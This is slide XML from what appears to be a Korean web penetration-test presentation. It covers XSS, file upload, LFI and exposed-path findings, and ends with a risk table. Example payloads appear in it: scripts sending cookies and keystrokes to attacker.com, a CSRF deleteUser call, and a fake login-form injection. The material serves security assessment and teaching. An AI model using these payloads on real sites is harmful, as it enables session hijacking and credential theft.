          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352159" y="6652258"/>
            <a:ext cx="1348473" cy="282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2A8C620F-BD21-4A5D-8CC2-DF6F8420376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66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A5B2F1-FB6E-4B4A-9A92-FEEF0E33A8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2348"/>
            <a:ext cx="10922088" cy="2450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2387D7-B4CB-4572-9468-24FA46EF54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55" y="3759198"/>
            <a:ext cx="8447132" cy="5071419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10568759" y="4169326"/>
            <a:ext cx="2349500" cy="897455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19616"/>
              <a:gd name="adj2" fmla="val -1072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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쉘 사용 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096500" y="7266523"/>
            <a:ext cx="2349500" cy="897455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70698"/>
              <a:gd name="adj2" fmla="val -674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디렉토리에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정보 확인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0DAA9C2E-A31F-465B-9394-F64AE797310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BBF875-B9E8-4523-B759-E16F0CFEAE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346155" y="5648647"/>
            <a:ext cx="8268837" cy="1219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C3792EC5-13F1-4359-B7CA-1A77C25A0A2A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81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525E49F-98B9-4DC6-99A1-81CF7840D9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9" y="1299444"/>
            <a:ext cx="10698446" cy="3615455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601507" y="1131694"/>
            <a:ext cx="2349500" cy="897455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40901"/>
              <a:gd name="adj2" fmla="val 15861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에서 민감한 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정보 확인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3D6F142-43EB-4307-A639-474166A6C9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8" y="4874171"/>
            <a:ext cx="6283806" cy="46534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9DB131-A5C1-4CD5-80AE-0E754EB8C6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79" y="4880734"/>
            <a:ext cx="6494166" cy="4646894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6A0912-1737-46AE-944D-B03A28E7C9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412874" y="1553470"/>
            <a:ext cx="4895655" cy="585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B88932FB-9335-4783-AE55-35C72636A5C7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7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145A1C-6216-4622-A750-807ACD56D5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5538" y="1291580"/>
            <a:ext cx="8791575" cy="46386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10246748" y="26693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채팅창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시도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113CA7-E274-4A82-954C-6CCBE5A7DFB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0704" b="38295"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345538" y="5894214"/>
            <a:ext cx="8791575" cy="3767349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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10246748" y="6283326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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점 발견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63B445-8718-4777-9687-9871856D9CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497667" y="5307440"/>
            <a:ext cx="3569633" cy="585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^</a:t>
            </a:r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B1091B9E-D006-4CA6-BD5E-D46AAD99B1C9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8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11539604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D39398-8674-4BED-9EC1-1BAD476088DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1333304" y="1069988"/>
            <a:ext cx="11012750" cy="7516982"/>
            <a:chOff x="1295400" y="1894643"/>
            <a:chExt cx="12466074" cy="5641509"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="78" name="Group 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{175A58F3-0FE3-4B1C-A5AB-24EF4988AB2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1295400" y="1894643"/>
              <a:ext cx="4051784" cy="2843547"/>
              <a:chOff x="0" y="-267809"/>
              <a:chExt cx="5402378" cy="3791396"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="79" name="Group 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{648E3DFC-0E22-45AE-8504-5EAA4FC01827}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="0" y="-267809"/>
                <a:ext cx="5402378" cy="3791396"/>
                <a:chOff x="0" y="-57150"/>
                <a:chExt cx="1152861" cy="809079"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="84" name="Freeform 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6EBE5BC-2BE7-403E-B93E-143B66CB1E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85" name="TextBox 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{447A70B1-DB54-4452-A409-464CD1A40C0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0" name="TextBox 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB1F1673-3237-40FE-A6B9-72D25EB937E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813549" cy="2438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1.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세션 탈취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1D9C2989-F656-4CFA-B09C-4456A2180226}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="172808" y="910891"/>
                <a:ext cx="454842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document.cookie</a:t>
                </a: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탈취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</p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C38968-5DC6-4A34-9AAD-0405A1695C13}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1295400" y="4893462"/>
              <a:ext cx="4066382" cy="2642690"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5421842" cy="3523587"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BD39D36-C697-400E-8B9D-992E9C4A4289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D276BD36-1E17-480A-A03B-C43BADA249E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93" name="TextBox 14">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A356420-08E8-4234-A5C9-666AA42C77E4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8" name="TextBox 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C138DC1-28E3-4B4A-9847-867F0681688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4.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웹쉘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삽입 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9" name="TextBox 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C0177E-B0EE-43A7-B4C6-2B30E8944060}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="229249" y="916573"/>
                <a:ext cx="2703747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1" name="TextBox 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE29C9B9-4D85-4024-ABA4-874DE5FC4894}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="223381" y="1327587"/>
                <a:ext cx="5198461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94" name="Group 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13708794-8DFB-4A64-89E7-2CBFB4CAC5D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5502545" y="2095500"/>
              <a:ext cx="4087520" cy="2642690"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5450026" cy="3523587"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="95" name="Group 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E809C542-3951-46E1-B4A9-9FE2437D82A2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0" name="Freeform 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13EB7728-1BBE-4027-8786-3EA5D94E26B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1" name="TextBox 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6F91BE-AF25-4519-BB4C-87AB8379EDE6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96" name="TextBox 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B0AD8A-46DC-4ED0-81BB-3890405561B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2.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사용자 입력 가로채기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97" name="TextBox 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E5177E5-A406-4BB5-9E13-885CF4442655}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="164283" y="910891"/>
                <a:ext cx="313959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Keylogger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설치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9" name="TextBox 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72A41F76-7BBA-4393-A42C-8971204AEE80}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="91780" y="1404829"/>
                <a:ext cx="5358246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document.onkeypress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function(e)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fetch('http://attacker.com/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keylog?key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=' + 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e.key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02" name="Group 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2136AAF6-1CB2-4371-A334-025CE0BE651B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5502545" y="4893462"/>
              <a:ext cx="4051785" cy="2642690"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5402378" cy="3523587"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="103" name="Group 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A18B48AA-B71E-40E4-8B16-83DE1F3FE3E1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8" name="Freeform 29">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19B0DE9-B406-4658-9541-91834574430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9" name="TextBox 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F50C516-96EF-4531-88B1-EC842996094D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04" name="TextBox 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8801EB-605C-492A-BEF5-F260FFDE2A6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5.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백도어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페이지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05" name="TextBox 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C9EB09-B00B-49B3-9AA9-BCA6C4E1C1E1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="313676" y="916573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07" name="TextBox 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE3C51F6-6898-451F-AE02-1CB9617DD2B8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="299271" y="1326021"/>
                <a:ext cx="4614988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10" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D1E057-2184-4329-81CC-99167CB0518B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9709690" y="2095500"/>
              <a:ext cx="4051784" cy="2642690"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5402378" cy="3523587"/>
            </a:xfrm>
          </p:grpSpPr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id="{5C865038-F5A9-4D0F-99BF-AED16EFA3EA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16" name="Freeform 45">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FE7724-5E37-4474-B9F6-567FB590105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17" name="TextBox 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31724474-0E8D-49D6-93DE-C30EE0899748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12" name="TextBox 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FBB9895-ECB9-4647-9321-FD3DD641BC75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3.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자동공격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권한상승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13" name="TextBox 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8648E9-3F02-4FC2-93C3-B29288782364}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="280969" y="910891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Stored XSS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115" name="TextBox 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AFA280E-21F4-4F0D-881F-A6255707B063}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="300940" y="1407377"/>
                <a:ext cx="4301279" cy="9569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fetch('/admin/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deleteUser?id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=1')  // CSRF + XSS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조합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script&gt;. </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="118" name="Group 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBD0933-8A52-47EC-A7C5-661B7183D7F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9709690" y="4893462"/>
              <a:ext cx="4051784" cy="2642690"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5402378" cy="3523587"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="119" name="Group 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE2CB64-4A7A-4DAD-AE5B-84B6BF497FC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24" name="Freeform 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10210E96-53E7-4780-AABA-13F8BDB406D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25" name="TextBox 54">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{134DAB2E-2CC6-43F3-8D19-F1D0F275DFA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20" name="TextBox 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54783F41-EF90-4653-A801-E3AE49DA0F30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UI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Redress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피싱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21" name="TextBox 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63B8DC50-B43C-4809-BCC6-9AA5C814D9B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="377872" y="916573"/>
                <a:ext cx="296284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가짜 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" alt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로그인폼으로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유도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23" name="TextBox 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425D373D-EE13-4199-B253-E66C696CC023}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="405830" y="1323573"/>
                <a:ext cx="4301279" cy="193220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document.body.innerHTML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'&lt;form action="/login" method="post"&gt;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아이디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name=id&gt;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비번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name=pw&gt;&lt;input type=submit&gt;&lt;/form&gt;';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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1AD7309-E298-4E3E-98F0-F39F183B54D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1423781" y="2744054"/>
            <a:ext cx="3210337" cy="95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&lt;script&gt;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 fetch(‘http://attacker.com/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steal?c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=‘ + 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document.cookie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);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&lt;/script&gt;</a:t>
            </a:r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CB850048-9739-4499-AA42-F2697D67A404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3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2800" spc="-500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="S-Core Dream 5 Medium"/>
              </a:rPr>
              <a:t>세션 탈 취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D9959A-3395-4562-A067-F832D2F33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50" y="1291582"/>
            <a:ext cx="11306148" cy="22047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57389C-FC89-4747-BC44-FA4C3614CF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50" y="4247169"/>
            <a:ext cx="11306148" cy="34866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70E187-5F21-41E2-B3B3-5E788754D9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1750" y="3494613"/>
            <a:ext cx="11306148" cy="75258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67987BA-0EA8-4481-B00F-DC8F25E341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750"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218175" y="7724651"/>
            <a:ext cx="1671324" cy="14097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E105597-19CD-4DB1-BD22-DFDA15E478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1750" y="7727857"/>
            <a:ext cx="1876425" cy="1409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0380BC-6DAD-4C86-A441-D7CCE86DEBC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0161" t="1" r="10355" b="-5905"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4885497" y="8440472"/>
            <a:ext cx="7762401" cy="72998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541BACA-F46D-4768-B419-56F0383DA5E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87631" b="-1548"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4885496" y="7698731"/>
            <a:ext cx="1880427" cy="78592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037F60-197A-46D1-973A-0FF55BC815E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367150" y="7187035"/>
            <a:ext cx="11129650" cy="206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253363B1-D5FB-4303-9810-CB23A2EACDA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6625917" y="7576536"/>
            <a:ext cx="2381764" cy="720459"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val -6426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세션탈취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61530410-87D7-442A-A401-3D272A9870A9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36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3958E3"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>위험도 평가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142929" y="801179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spc="-50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취약점위험도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sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46AA1159-384A-41EC-A1AD-1F5B0C83787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456D0088-37D4-4F96-9B25-D5FEB1792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462286"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1349829" y="1280329"/>
          <a:ext cx="10913836" cy="535679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73045">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="895145255"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4016646">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3400629399"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1413264">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2530222696"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4710881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3316526149"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5562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취약점 항목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위험도</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US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/>
                        <a:t>설명</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US">
                        <a:latin typeface="Pretendar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982352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  <a:endParaRPr lang="en-US" altLang="ko-KR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XSS (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>크로스사이트스크립팅</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR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높음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쿠키 탈취 가능 → 세션 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>하이재킹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관리자 계정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817799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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR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업로드 취약점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높음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확장자 우회로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>PHP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>실행 가능 → 서버 쉘 접근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747953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3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR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LFI (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                        <a:t>로컬 파일 포함</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR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높음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디렉터리 접근 가능 → 내부 구조 노출 가능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192609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4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR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보안정책 노출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중간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fileupload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등 숨겨진 경로 노출 → 공격자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475987"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="960108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5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR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디렉터리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>브루트포싱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중간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웹 루트 내 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                        <a:t>db.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>에 계정 정보 포함</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
